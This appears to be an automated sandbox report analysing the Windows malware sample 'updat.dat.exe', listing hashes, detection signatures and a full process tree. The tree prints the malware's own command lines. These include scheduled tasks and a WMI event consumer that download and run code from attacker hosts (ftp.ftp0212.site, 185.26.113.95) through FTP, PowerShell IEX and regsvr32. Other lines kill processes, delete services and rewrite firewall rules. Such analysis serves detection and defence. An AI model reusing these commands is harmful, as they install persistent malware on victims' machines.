Analysis
max time kernel: 150s
max time network: 124s
platform: windows10_x64
resource: win10v20210408
submitted: 07-05-2021 13:01

Static task: static1
Behavioral task: behavioral1
  Sample: updat.dat.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: updat.dat.exe
  Resource: win10v20210408
General
Target: updat.dat.exe
Size: 307KB
MD5: a6ab2c2fd64e96dcfbf2cef7b2b40863
SHA1: 072e8e442c5727d52c42cf892c58cf9f143ed2a7
SHA256: f6b85d37652472106287a32fe547d511b0da9d14d4802fc6346d38bff2d8c8a6
SHA512: 49e83aebe95241348058a5320a8737d0756247892f3b1bfe913bc2a15cf2b1040b88dc897d0b31641d5252740272901d04104cfabb3b32e747489d268eab4de7

Malware Config
Extracted: http://185.26.113.95:8095/batpower2.txt
Signatures

Blocklisted process makes network request (1 IoC)
Processes:
  flow  pid   process
  19    1940  powershell.exe

Downloads MZ/PE file

Executes dropped EXE (4 IoCs)
Processes:
  pid   process
  212   lsma12.exe
  4932  lsma12.exe
  3324  excludess.exe
  2340  excludess2.exe
Modifies Windows Firewall (1 TTP)

Sets file execution options in registry (2 TTPs)

Stops running service(s) (3 TTPs)

Processes:
  resource                              yara_rule
  C:\Windows\INF\aspnet\lsma12.exe      upx
  \??\c:\windows\inf\aspnet\lsma12.exe  upx
  C:\Windows\INF\aspnet\lsma12.exe      upx
Drops file in Windows directory (5 IoCs)
Processes:
  description   ioc                                       process
  File created  \??\c:\windows\inf\aspnet\excludess.exe   powershell.exe
  File created  \??\c:\windows\inf\aspnet\excludess2.exe  powershell.exe
  File created  \??\c:\windows\inf\aspnet\lsma12.exe      powershell.exe
  File created  \??\c:\windows\inf\aspnet\config.json     powershell.exe
  File created  \??\c:\windows\update.exe                 powershell.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                                  process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      lsma12.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  lsma12.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 lsma12.exe
Creates scheduled task(s) (1 TTP, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid   process
  3336  schtasks.exe
  2148  schtasks.exe
  2124  schtasks.exe

Delays execution with timeout.exe (1 IoC)
Processes:
  pid   process
  648   timeout.exe
Kills process with taskkill (20 IoCs)
Processes:
  taskkill.exe, pids: 1524, 2124, 5076, 2432, 1056, 4168, 804, 1364, 3892, 1220, 1448, 996, 1160, 4204, 396, 996, 1032, 2568, 4048, 2872
Modifies registry class (1 IoC)
Processes:
  description  ioc                                                                                 process
  Key created  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings  updat.dat.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (the 64 entries repeat these two pid/process pairs):
  pid   process
  1940  powershell.exe
  212   lsma12.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)

Suspicious use of WriteProcessMemory (64 IoCs)
Processes
Process tree (each "*" entry is one process, indented by its depth under the sample; beneath it are its command line and the signatures it triggered):

* C:\Users\Admin\AppData\Local\Temp\updat.dat.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\updat.dat.exe"
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
  * C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\windows\TEMP\n.vbs"
      - Suspicious use of WriteProcessMemory
    * C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Windows\temp\c3m.bat" "
        - Suspicious use of WriteProcessMemory
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im msinfo.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhos.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhou.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhot.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhous.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhoss.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im rundll32.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhous.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhot.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhos.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhou.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\temp\conhou.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\temp\conhos.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\temp\conhot.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\system\msinfo.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\debug\item.dat /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\debug\winu.bat /e /d system
      * C:\Windows\SysWOW64\cmd.exe
          Command line: cmd /c net1 stop ASBservice
        * C:\Windows\SysWOW64\net1.exe
            Command line: net1 stop ASBservice
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete ASBservice
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop msupdate
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete msupdate
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop clr_optimization_v4.0.30328_64
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete clr_optimization_v4.0.30328_64
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop MicrosoftMsql
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete MicrosoftMsql
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop netsv
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete netsv
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop NetworkServices
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete NetworkServices
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop "Network Remote"
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete "Network Remote"
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop "WinTaskCtrlService"
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete "WinTaskCtrlService"
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop remotecall
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete remotecall
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop rpcept
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete rpcept
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop csrss
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete csrss
      * C:\Windows\SysWOW64\net1.exe
          Command line: net1 stop "windows audio control"
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc delete "windows audio control"
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0212.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F
          - Creates scheduled task(s)
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0212.site>ps&echo test>>ps&echo 1433>>ps&echo get sab.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F
          - Creates scheduled task(s)
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /create /tn "oka" /tr "cmd /c start c:\windows\inf\aspnet\lsma12.exe -p" /ru "system" /sc onstart /F
          - Creates scheduled task(s)
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "MicrosoftsWindowsa" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "MicrosoftsWindowsu" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "MicrosoftsWindows" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "MicrosoftsWindowsu1" /F
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
          - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" delete
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "Mysa3" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "ok" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "\Mysa1" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "WindowsUpdate1" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "OfficeUpdaterA" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "WindowsUpdate3" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "at6" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "Windows_Update" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "Update" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "Update2" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "Update4" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "Update3" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "windowsinit" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "System Security Check" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "AdobeFlashPlayer" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "updat_windows" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "at1" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "at2" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete "\Microsoft\Windows\UPnP\Services" /F
      * C:\Windows\SysWOW64\sc.exe
          Command line: sc config MpsSvc start= auto
      * C:\Windows\SysWOW64\net.exe
          Command line: net start MpsSvc
        * C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 start MpsSvc
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static delete policy name=win
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static delete filterlist name=Allowlist
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static delete filterlist name=denylist
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static delete filteraction name=allow
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall firewall delete rule name="tcp all" dir=in
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall firewall delete rule name="tcpall" dir=out
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall set allprofiles state on
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add policy name=win
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filterlist name=Allowlist
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filterlist name=denylist
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filteraction name=Allow action=permit
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add filteraction name=deny action=block
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
      * C:\Windows\SysWOW64\netsh.exe
          Command line: netsh ipsec static set policy name=win assign=y
      * C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" ver "
      * C:\Windows\SysWOW64\find.exe
          Command line: find "5.1."
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="coronav" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="coronav2" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="coronav2" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='coronav2'" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckamm3" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckamm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckamm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckamm4'" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckann3" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckann4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckann4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckann4'" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="killmm3" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="killmm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="killmm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='killmm4'" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="kuckavv3" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="kuckavv4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="kuckavv4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='kuckavv4'" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="kvckavv3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 13000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="kvckavv4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.ftp0212.site:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8205/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8095/power.txt')||regsvr32 /u /s /i:http://185.26.113.95:8204/s.txt scrobj.dll&regsvr32 /u /s /i:http://185.26.113.95:8205/s.txt scrobj.dll&regsvr32 /u /s /i:http://185.26.113.95:8221/s.txt scrobj.dll&regsvr32 /u /s /i:http://185.26.113.95:8096/s.txt scrobj.dll&regsvr32 /u /s /i:http://185.26.113.95:8095/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.ftp0212.site:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://185.26.113.95:8220/s.xsl\""
      * C:\Windows\SysWOW64\cmd.exe
          Command line: cmd /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"kvckavv3\"", Consumer="CommandLineEventConsumer.Name=\"kvckavv4\""
        * C:\Windows\SysWOW64\Wbem\WMIC.exe
            Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"kvckavv3\"", Consumer="CommandLineEventConsumer.Name=\"kvckavv4\""
      * C:\Windows\SysWOW64\timeout.exe
          Command line: timeout /t 40 /nobreak
          - Delays execution with timeout.exe
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im msinfo.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhos.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhot.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhou.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im rundll32.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\temp\conhou.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\temp\conhos.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\temp\conhot.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\temp\conhous.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\temp\conhoss.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\system\msinfo.exe /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\debug\item.dat /e /d system
      * C:\Windows\SysWOW64\cacls.exe
          Command line: cacls c:\windows\debug\winu.bat /e /d system
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im msinfo.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhos.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhou.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhous.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im conhoss.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /f /im rundll32.exe
          - Kills process with taskkill
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhous.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhot.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhos.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhou.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
      * C:\Windows\SysWOW64\schtasks.exe
